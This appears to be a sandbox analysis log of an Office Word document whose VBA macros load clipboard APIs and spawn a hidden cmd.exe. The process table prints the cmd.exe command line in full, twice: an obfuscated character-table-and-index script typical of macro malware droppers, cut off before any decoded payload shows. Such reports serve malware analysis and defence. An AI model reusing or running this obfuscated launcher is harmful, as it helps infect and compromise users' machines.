| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:27 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 79, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x7fee34efcd0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:27 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 64 |
|
1 | |
| System | Get Cursor | x_out = 1141, y_out = 593 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:27 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:27 (Local Time) |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Cursor | x_out = 1141, y_out = 593 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:27 (Local Time) |
|
6 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:28 (Local Time) |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4214ee0 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-11-14 09:19:28 (Local Time) |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fee4422a6c |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GlobalAlloc, address_out = 0x77b280c0 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GlobalLock, address_out = 0x77b6e760 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcpy, address_out = 0x77b6e160 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GlobalUnlock, address_out = 0x77b6e570 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = OpenClipboard, address_out = 0x77a45a70 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EmptyClipboard, address_out = 0x77a3e3c0 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = SetClipboardData, address_out = 0x77a3e43c |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = CloseClipboard, address_out = 0x77a45a50 |
|
1 | |
| Process | Create | process_name = Cmd.exe /V:ON/C"set begw=r$Oq\a+N,=^^oWR^&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd &&for %4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,37,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66,0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,12,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21,78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66,68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,7, os_pid = 0xacc, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| System | Get Cursor | x_out = 1141, y_out = 593 |
|
1 | |
| Registry | Write Value | value_name = Microsoft Word, size = 151, type = REG_BINARY |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Ticks, time = 276418 |
|
9 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4214ee0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fee4422a6c |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fee4214ee0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee4110000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fee4422a6c |
|
1 |
Process #2: cmd.exe
21374
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | Cmd.exe /V:ON/C"set begw=r$Oq\a+N,=^^oWR^&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd &&for %4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,37,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66,0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,1